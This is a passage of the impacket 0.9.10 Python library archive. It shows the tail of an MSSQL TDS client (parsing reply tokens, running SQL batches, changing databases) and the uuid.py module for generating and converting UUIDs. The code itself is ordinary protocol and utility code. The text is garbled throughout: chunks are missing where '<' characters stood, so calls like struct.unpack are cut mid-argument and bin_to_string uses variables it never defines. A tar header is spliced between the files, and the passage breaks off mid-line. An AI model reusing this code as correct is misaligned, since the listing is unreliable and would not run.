TODO Add support for more data types! count = token['Count'] if count == 0xFFFF: return 0 self.colMeta = [] origDataLen = len(token['Data']) data = token['Data'] for i in range(count): column = {} userType = struct.unpack(' 0: tokenID = struct.unpack('B',tokens[0])[0] if tokenID == TDS_ERROR_TOKEN: token = TDS_INFO_ERROR(tokens) elif tokenID == TDS_RETURNSTATUS_TOKEN: token = TDS_RETURNSTATUS(tokens) elif tokenID == TDS_INFO_TOKEN: token = TDS_INFO_ERROR(tokens) elif tokenID == TDS_LOGINACK_TOKEN: token = TDS_LOGIN_ACK(tokens) elif tokenID == TDS_ENVCHANGE_TOKEN: token = TDS_ENVCHANGE(tokens) if token['Type'] is TDS_ENVCHANGE_PACKETSIZE: record = TDS_ENVCHANGE_VARCHAR(token['Data']) self.packetSize = string.atoi( record['NewValue'].decode('utf-16le') ) elif token['Type'] is TDS_ENVCHANGE_DATABASE: record = TDS_ENVCHANGE_VARCHAR(token['Data']) self.currentDB = record['NewValue'].decode('utf-16le') elif (tokenID == TDS_DONEINPROC_TOKEN) |\ (tokenID == TDS_DONEPROC_TOKEN): token = TDS_DONEINPROC(tokens) elif tokenID == TDS_ORDER_TOKEN: token = TDS_ORDER(tokens) elif tokenID == TDS_ROW_TOKEN: #print "ROW" token = TDS_ROW(tokens) tokenLen = self.parseRow(token) token['Data'] = token['Data'][:tokenLen] elif tokenID == TDS_COLMETADATA_TOKEN: #print "COLMETA" token = TDS_COLMETADATA(tokens) tokenLen = self.parseColMetaData(token) token['Data'] = token['Data'][:tokenLen] elif tokenID == TDS_DONE_TOKEN: token = TDS_DONE(tokens) else: print "Unknown Token %x" % tokenID return replies if replies.has_key(tokenID) is not True: replies[tokenID] = list() replies[tokenID].append(token) tokens = tokens[len(token):] #print "TYPE 0x%x, LEN: %d" %(tokenID, len(token)) #print repr(tokens[:10]) return replies def batch(self, cmd): # First of all we clear the rows, colMeta and lastError self.rows = [] self.colMeta = [] self.lastError = False self.sendTDS(TDS_SQL_BATCH, (cmd+'\r\n').encode('utf-16le')) tds = self.recvTDS() self.replies = self.parseReply(tds['Data']) return self.rows # Handy alias sql_query = batch def changeDB(self, db): if db != self.currentDB: self.batch('use %s' % db) self.printReplies() def RunSQL(self,db,sql_query, **kwArgs): self.changeDB(db) self.printReplies() ret = self.batch(sql_query) self.printReplies() return ret impacket-0.9.10/impacket/uuid.py0000600000076500000240000000510312141750575016565 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: uuid.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # # Description: # Generate UUID compliant with http://www.webdav.org/specs/draft-leach-uuids-guids-01.txt. # A different, much simpler (not necessarily better) algorithm is used. # # Author: # Javier Kohen (jkohen) # import re from random import randrange from struct import pack, unpack def generate(): # UHm... crappy Python has an maximum integer of 2**31-1. top = (1L<<31)-1 return pack("IIII", randrange(top), randrange(top), randrange(top), randrange(top)) def bin_to_string(uuid): uuid1, uuid2, uuid3 = unpack('HHL', uuid[8:16]) return '%08X-%04X-%04X-%04X-%04X%08X' % (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) def string_to_bin(uuid): matches = re.match('([\dA-Fa-f]{8})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})([\dA-Fa-f]{8})', uuid) (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) = map(lambda x: long(x, 16), matches.groups()) uuid = pack('HHL', uuid4, uuid5, uuid6) return uuid def stringver_to_bin(s): (maj,min) = s.split('.') return pack('